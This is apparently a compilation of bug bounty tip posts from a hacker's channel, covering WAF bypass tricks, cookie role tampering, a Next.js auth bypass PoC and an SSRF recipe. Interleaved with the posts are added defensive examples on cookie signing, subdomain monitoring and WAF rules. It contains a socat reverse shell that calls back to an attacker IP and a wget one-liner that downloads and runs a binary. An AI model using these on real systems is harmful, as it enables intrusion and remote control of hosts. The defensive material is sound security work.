Recently disclosed HackerOne critical bug, exploitable in a few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you are all interested in simple and smart tricks, never forget to react.
A simple hunt can flip the whole game!
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==
I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow, it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
BOOM! Instantly, we got admin access!
Follow me ...DarkShadow...
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
For more, join my new Telegram channel: https://t.co/9p1yvzluA4
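The cookie in the story above is only encoded, not protected: Base64 hides nothing from anyone with a terminal, and the server trusts whatever comes back. As an added example (not code from the original post or its author), here is the same cookie issued with an HMAC-SHA256 tag over the encoded payload, plus a verifier that rejects the decode-edit-reencode trick. The server key is a constructed placeholder, and openssl is assumed to be on PATH.

```shell
#!/bin/sh
# Added example, not from the original post: the base64 cookie from the story
# next to a signed version that survives the decode-edit-reencode trick.
# Assumptions: KEY is a constructed demo secret (real ones come from a secret
# store), and `openssl` is available for HMAC-SHA256.

KEY='demo-server-secret-do-not-reuse'

b64()   { printf '%s' "$1" | base64 | tr -d '\n'; }
unb64() { printf '%s' "$1" | base64 -d 2>/dev/null; }

# HMAC-SHA256 of $1 under KEY, hex encoded (last field of openssl's output line)
hmac_hex() {
  printf '%s' "$1" | openssl dgst -sha256 -hmac "$KEY" | sed 's/^.* //'
}

# Server side, issuing: <base64(payload)>.<hmac(base64(payload))>
# The tag covers the exact bytes the client will send back, so any edit to
# the payload invalidates it.
sign_cookie() {   # $1 = plaintext session payload
  p=$(b64 "$1")
  printf '%s.%s' "$p" "$(hmac_hex "$p")"
}

# Server side, checking: recompute the tag and compare; print the decoded
# payload only when it matches. Returns 1 for a missing or wrong tag.
# (A production verifier would use a constant-time compare; `=` here is not.)
verify_cookie() { # $1 = cookie as received
  case $1 in *.*) ;; *) return 1 ;; esac
  p=${1%.*}; t=${1##*.}
  [ "$(hmac_hex "$p")" = "$t" ] || return 1
  unb64 "$p"
}

# Attacker side, the move from the post: decode, flip the role, re-encode.
# Against the unsigned cookie this is the whole exploit; against the signed
# one it yields a payload the server refuses because the tag no longer fits.
forge_role() {    # $1 = cookie, $2 = new role
  p=${1%.*}
  unb64 "$p" | sed "s/role:[a-z]*/role:$2/" | base64 | tr -d '\n'
}

# Stand-alone demo
unsigned='e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg=='   # the cookie from the post
signed=$(sign_cookie '{user:darkshadow,role:user}')
echo "unsigned cookie, forged: $(forge_role "$unsigned" admin)"
echo "signed cookie:           $signed"
if verify_cookie "$(forge_role "$signed" admin).${signed##*.}" >/dev/null; then
  echo "forged signed cookie ACCEPTED (bug)"
else
  echo "forged signed cookie rejected"
fi
```

The forged unsigned cookie comes out as the exact admin value from the post; the forged signed cookie fails because the old tag was computed over `role:user`. Signing stops tampering but not reading, so anything secret still has to stay out of the cookie or be encrypted.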
Everyone, let's dive deep into the art of WAF bypass techniques, a must-know skill for every serious bug bounty hunter.
Bypass Series for bug hunters
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts
man /etc/hosts
nl /etc/hosts
less /etc/hosts
more /etc/hosts
strings /etc/hosts
tail /etc/hosts
head /etc/hosts
Follow me DarkShadow
#Bugbountytips #series
Bypass Series for bug hunters
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
With the right dork, the whole game changes: recon becomes domination.
Dork:
inurl:search.php inurl:sqlQuery inurl:&
For more, follow DarkShadow
#bugbountytips
This is wild!
You've probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927), but there's another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
curl https://target.com/?__nextLocale=/admin
This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
New Script Alert: Subdomain Monitoring (Coming Soon!)
from Brut Security
For those who've been waiting on a simple and efficient way to monitor subdomains automatically, your wait is almost over.
We've been working on a Bash script that:
- Monitors your target domains every 6 hours
- Uses subfinder, anew, and notify
- Sends actual new subdomains as file attachments directly to your Discord webhook
- Clean, lightweight & made for practical usage in recon and bug bounty
The release isn't today, it's dropping next week, but I thought I'd give you all a heads-up.
If you're into bug hunting, automation, or OSINT, this might be super useful for your workflow.
Share with your team
React if you're excited
Let's get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
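The announcement above describes a scan, diff, notify loop. As an added example (not the unreleased Brut Security script, and not code from the channel), here is a minimal version of that loop: subfinder is only invoked when installed, the "what is new since last run" step is plain POSIX (the job anew does), and the Discord upload is a multipart webhook POST. WEBHOOK_URL, STATE_DIR and the cron line are assumptions; the test list used below is constructed.

```shell
#!/bin/sh
# Added example, not the Brut Security script announced above (that one is
# unreleased): a minimal version of the same loop. subfinder is only called
# when installed; the "what is new" step is plain POSIX so it can be checked
# with a constructed list. WEBHOOK_URL, STATE_DIR and the cron line are
# assumptions.

STATE_DIR=${STATE_DIR:-"$HOME/.subdomain-monitor"}

# Lines of the fresh scan ($1) not present in the known list ($2), the job
# `anew` does. The known file is created if missing so a first run reports
# everything as new. grep exits 1 when nothing is new, which is not an error.
new_entries() {       # $1 = fresh scan file, $2 = known list file
  [ -f "$2" ] || : > "$2"
  sort -u "$1" | grep -vxFf "$2" || true
}

# Push the new list to Discord as a file attachment (multipart upload).
post_to_discord() {   # $1 = file with new subdomains, $2 = domain
  if [ -z "${WEBHOOK_URL:-}" ]; then
    echo "WEBHOOK_URL not set; would have sent $(wc -l < "$1") entries for $2" >&2
    return 0
  fi
  curl -sS -F "content=New subdomains for $2" -F "files[0]=@$1" "$WEBHOOK_URL" >/dev/null
}

# One monitoring pass for a domain: scan, diff against state, notify, persist.
# State is only updated after a successful send, so a failed notification is
# retried on the next run instead of being silently lost.
monitor_domain() {    # $1 = domain
  mkdir -p "$STATE_DIR"
  known="$STATE_DIR/$1.known"
  fresh=$(mktemp) || return 1
  if ! command -v subfinder >/dev/null 2>&1; then
    echo "subfinder not installed" >&2; rm -f "$fresh"; return 1
  fi
  subfinder -silent -d "$1" > "$fresh"
  new_entries "$fresh" "$known" > "$fresh.new"
  if [ -s "$fresh.new" ]; then
    post_to_discord "$fresh.new" "$1" && cat "$fresh.new" >> "$known"
  fi
  rm -f "$fresh" "$fresh.new"
}

# Six-hour schedule from the post, as a cron line (path is an assumption):
#   0 */6 * * * WEBHOOK_URL=https://discord.com/api/webhooks/... /opt/monitor.sh example.com
for d in "$@"; do monitor_domain "$d"; done
```

Run it as `monitor.sh example.com other.org` from cron with WEBHOOK_URL exported. Keep the webhook URL out of the script file itself; anyone who can read it can post into your channel.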
API_Hacking_with_Javascript_Checklist.pdf (47.1 MB)
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
Convert your basic nc reverse shell to a pro interactive shell
Bash Series for bug hunters
Part-1
Use python to spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Use this command so the clear command works:
export TERM=xterm-256color
Get a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] '
Use these aliases to speed things up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'
To suspend the shell temporarily:
Press Ctrl+Z
Use this command to get back into the session:
stty raw -echo; fg
Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
Bypass Series for bug hunters
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect (fish shell syntax)
cat /etc/hosts | while read line; echo $line; end (fish shell syntax)
echo (cat /etc/hosts) (fish shell syntax; in bash use echo "$(cat /etc/hosts)")
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
Bash Series for bug hunters
Part-2
Stop using nc directly and try the following command:
rlwrap -cAr nc -lvnp <port>
Or
rlwrap -f . -r nc -lnvp <port>
Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
socat file:`tty`,raw,echo=0 tcp-listen:<port>
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker_ip>:<port>
If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker_ip>:<port>
To stop socat:
ps aux | grep socat
kill -9 <PID>
Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata, disclosed and rewarded $25,000!
The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click "Apply" (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks, don't forget to react & share.
Follow me DarkShadow
This is really cool
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing the target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
Bypass Series for bug hunters
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d ' '
cat $HOME/../../etc/hosts (only resolves when $HOME is two levels deep, e.g. /home/user)
cat ${PWD}/../../../etc/hosts (depends on the depth of the current directory)
grep "" /etc/hosts
cut -c1- /etc/hosts
paste /etc/hosts
Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one, it's really awesome!
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
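Every command in Parts 1 to 4 of the series reads the same file with a different tool, which only works when the filter keys on the tool name. As an added example (not code from the series or its author), here is a toy signature filter of that kind next to one keyed on the target path, and a checker that reports which series payloads each one lets through. Both rules are constructed assumptions, not any vendor's rule set, and a real WAF also normalizes encoding and whitespace before matching.

```shell
#!/bin/sh
# Added example, not from the series: a toy signature filter that behaves
# like the rule the series is beating, and a checker that reports which
# variants slip past it. Both rules are constructed assumptions, not any
# vendor's rule set.

# Rule A: the kind of pattern that fires on `cat /etc/hosts` and nothing else
# in the series, because it keys on the tool name.
naive_rule='(^|[^a-z])cat[[:space:]]+/'

# Rule B: keyed on the sensitive target instead of the reader. It catches every
# variant in the series, since all of them still spell out /etc/hosts.
strict_rule='/etc/(hosts|passwd|shadow)|/proc/self/'

# Constructed payload set taken from Parts 1-4 of the series (${HOME} stays
# literal here on purpose; the WAF sees the raw request, not the expansion).
payloads='cat /etc/hosts
tac /etc/hosts
nl /etc/hosts
cat < /etc/hosts
rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d " "
cat ${HOME}/../../etc/hosts'

# Returns 0 when the rule matches the payload (blocked), 1 otherwise.
is_blocked() {        # $1 = payload, $2 = extended regex
  printf '%s' "$1" | grep -Eiq "$2"
}

# Prints the payloads read from stdin that a rule lets through.
passing_payloads() {  # $1 = extended regex
  while IFS= read -r p; do
    is_blocked "$p" "$1" || printf '%s\n' "$p"
  done
}

# Number of series payloads that pass a rule.
pass_count() {        # $1 = extended regex
  printf '%s\n' "$payloads" | passing_payloads "$1" | wc -l | tr -d ' '
}

# Stand-alone demo
echo "Rule A (tool name) lets through $(pass_count "$naive_rule") of 7 payloads:"
printf '%s\n' "$payloads" | passing_payloads "$naive_rule" | sed 's/^/  /'
echo "Rule B (target path) lets through $(pass_count "$strict_rule") of 7 payloads"
```

Rule A passes six of the seven payloads, Rule B none of them. The practical reading for both sides: a blocklist of reader commands is never complete, so detection belongs on the resource being reached (and on the command-injection sink itself), not on the verb used to reach it.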
Bash Series for bug hunters
Part-2
Create multiple folders using a one-liner:
mkdir {dev,test,prod}
This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
touch {file1,file2,file3}.txt
This creates file1.txt, file2.txt, file3.txt
Generating Files with Numeric Sequences:
seq -w 1 10 | xargs -I {} touch file{}.txt
This creates file01.txt, file02.txt, file03.txt ... file10.txt
Boost your bug hunting with pro Bash commands, a must for every hacker!
Don't forget to react
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
program-list.json (1.1 MB)
Helpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format; the JSON file is attached above.
Don't forget to react
Follow me DarkShadow
#BugBountytips